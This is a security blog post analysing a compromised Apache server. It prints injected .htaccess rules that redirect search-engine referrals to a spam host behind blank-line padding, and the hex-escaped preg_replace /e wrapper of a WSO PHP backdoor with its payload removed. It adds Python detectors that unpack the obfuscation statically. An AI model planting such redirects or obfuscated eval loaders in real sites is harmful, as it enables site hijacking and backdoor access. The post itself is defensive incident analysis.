Hijacked .htaccess

Post: 31 August 2012 by kriss in: Security

During the weekly maintenance of the Windows server of one of our clients, after it had been reported to us that searching for the website on Google returned strange Russian websites and that the antivirus raised warnings when visiting the website, I noticed something strange while adjusting Apache's configuration for efficiency: the .htaccess files contained odd modifications that did not look like they came from me or my team. I realized that the .htaccess files had been hijacked in order to redirect referral traffic to spam websites. Here is the content of the file (scroll right to see the cream):

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*)
    RewriteRule ^(.*)$ http://deafmassachusetts.info/Conference?8 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://deafmassachusetts.info/Conference?8 [R=301,L]
    </IfModule>

    [... 60 blank lines ...]

    ErrorDocument 500 http://deafmassachusetts.info/Conference?8

    [... 51 blank lines ...]

As you can see, the hacker tried very hard to hide the malicious lines by adding a lot of empty lines or blank characters before the actual annoyance.

A few things should be noted about this issue. First, all .htaccess files under the DocumentRoot of the server were modified. If an .htaccess file did not initially exist, it was created. If it did exist, it was altered with lines similar to the ones above. In both cases, the file was also set to read-only to prevent lower-privileged users from cleaning it.
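A check for the traits described above (a referer-conditional redirect to another host, an off-site ErrorDocument, and directives hidden behind blank lines or whitespace padding), given here as an added Python example that is not part of the original post. The function name, the thresholds and the sample file with its placeholder host redirect.example are assumptions made for illustration.

```python
import re

# Constructed sample modelled on the injected file shown above (search-engine
# list shortened, redirect host replaced by a placeholder).
SAMPLE = (
    "\n<IfModule mod_rewrite.c>\n"
    "RewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing)\\.(.*)\n"
    + " " * 300 + "RewriteRule ^(.*)$ http://redirect.example/x?8 [R=301,L]\n"
    "</IfModule>\n" + "\n" * 60
    + "ErrorDocument 500 http://redirect.example/x?8\n"
)

EXTERNAL = re.compile(r"https?://([^/\s\]]+)", re.I)

def audit_htaccess(text, own_hosts=(), max_blank_run=10, max_indent=40):
    """Return (line_no, reason) findings for the text of one .htaccess file."""
    findings, blank_run, referer_cond = [], 0, False
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            blank_run += 1
            continue
        if blank_run > max_blank_run:
            findings.append((no, f"directive after {blank_run} blank lines"))
        blank_run = 0
        if len(raw) - len(raw.lstrip()) > max_indent:
            findings.append((no, "directive pushed right by whitespace padding"))
        lower = line.lower()
        if lower.startswith("rewritecond"):
            # RewriteCond lines apply only to the next RewriteRule
            referer_cond = referer_cond or "http_referer" in lower
            continue
        m = EXTERNAL.search(line)
        foreign = m and m.group(1).lower() not in own_hosts
        if lower.startswith("rewriterule"):
            if foreign and referer_cond:
                findings.append((no, f"referer-conditional redirect to {m.group(1)}"))
            referer_cond = False
        elif lower.startswith("errordocument") and foreign:
            findings.append((no, f"ErrorDocument points off-site to {m.group(1)}"))
    return findings
```

Run it over every .htaccess under the DocumentRoot, passing the server's own host names in `own_hosts` so that legitimate canonical-host redirects are not reported.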

Although cleaning the files was trivial, it took us a little more time to determine how they could have been modified in the first place. A thorough inspection of the logs finally revealed that one of the Joomla! websites hosted on the machine had been hit by strange activity: namely, many POST requests to a hidden PHP script in an images folder. Well, the file was not exactly hidden, since we are talking about a Windows server. In our case, the file was called .cache_nfl5jf.php, although this name was probably generated randomly.

I fired up my text editor to inspect the content of this file and discovered yet another base64-encoded song. At first glance, it looked like many other Joomla! PHP scripts, starting with some copyright comments, defining a class whose name starts with J, etc. However, the first hint that made me think the file was not legitimate was the lack of:

    defined('_JEXEC') or die('no direct access');

Although the prolog comment was actually here:

    // no direct access

The file was indeed directly accessible as an entry point, and the logs proved that it was actually accessed abusively. As for the eval(), it was near the end of the file, after the class definition, but cleverly hidden. See for yourself:

    preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'[base64-encoded payload removed]'\x29\x29\x20\x29\x20\x3b",".");

The hacker did not use eval() directly, which is too easy to find with grep and other tools. Instead, he used the special construct preg_replace('/.../e', ...), which still evaluates dynamically generated PHP code, but with levels of obfuscation that programmers may find hard to notice. The second argument starts with:

\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28

Ah yes, another interesting feature of the PHP language is that, in string literals enclosed in double quotes, it converts hexadecimal escape sequences to regular ASCII characters. This feature is being used here to further cloak the malicious code, and the escaped characters above are decoded to the evil:

eval ( gzinflate ( base64_decode (

The end of the argument is the closing parentheses of the function calls:

\x29\x29\x20\x29\x20\x3b

or:

)) ) ;

The data in between is simply the base64-encoded code to run at each invocation of the script. Reverse-engineering this data revealed that this code is a backdoor named WSO, which seems to be popular in the hacker community. The tool appeared to be extremely powerful and gives the hacker complete control over the machine. It even included a password protection feature so that the hacker could be the only one to use it to compromise the machine. I removed it from the server to stop the issue.
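The cloaking described above can be undone statically, without running any PHP. The following is an added Python example, not part of the original post: it flags the /e modifier, reports function names that only appear after \x decoding, and unpacks the gzinflate/base64 layer for review. The function names and the harmless constructed sample are assumptions made for illustration.

```python
import base64, re, zlib

HEX_ESC = re.compile(r"\\x([0-9A-Fa-f]{1,2})")
# preg_replace whose pattern string ends in flags containing "e" (replacement is executed)
E_MODIFIER = re.compile(
    r"""preg_replace\s*\(\s*(["'])(\W)(?:(?!\1).)*\2[a-zA-Z]*e[a-zA-Z]*\1""", re.S)
WRAPPERS = ("eval", "gzinflate", "base64_decode")

def decode_php_hex(src):
    """Expand PHP double-quoted \\xNN escapes to the characters they denote."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), src)

def scan_php(src):
    """Return the reasons a PHP source matches the pattern described above."""
    reasons = []
    if E_MODIFIER.search(src):
        reasons.append("preg_replace /e modifier (replacement is executed)")
    decoded = decode_php_hex(src)
    hidden = [w for w in WRAPPERS if w in decoded and w not in src]
    if hidden:
        reasons.append("only visible after \\x decoding: " + ", ".join(hidden))
    return reasons

def unpack_payload(src):
    """Recover the text behind gzinflate(base64_decode('...')); never executes it."""
    m = re.search(r"base64_decode\s*\(\s*'([A-Za-z0-9+/=\s]+)'", decode_php_hex(src))
    if not m:
        return None
    # PHP's gzinflate() reads raw DEFLATE data, hence wbits=-15
    return zlib.decompress(base64.b64decode(m.group(1)), -15).decode("utf-8", "replace")

def make_sample(inner=b'echo "constructed harmless payload";'):
    """Constructed test line in the same shape as the one found on the server."""
    hexed = lambda s: "".join("\\x%02x" % b for b in s)
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(c.compress(inner) + c.flush()).decode()
    return ('preg_replace("/.*/e","' + hexed(b"eval ( gzinflate ( base64_decode (")
            + "'" + blob + "'" + hexed(b")) ) ;") + '",".");')
```

A plain grep for eval finds nothing in such a file, which is why the scan compares the source before and after escape decoding.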

For now, the attacks have stopped, but it is still unclear how this file was put on the server in the first place. As usual, outdated extensions are probably the reason. The server was hosting mostly Joomla! websites and some WordPress blogs, but the tool was simply used to compromise every website via .htaccess.

Security can never be perfect, but it can be improved each day, and this article should hopefully remind you how important it is to stay up to date and to check server logs from time to time to detect abnormal activity.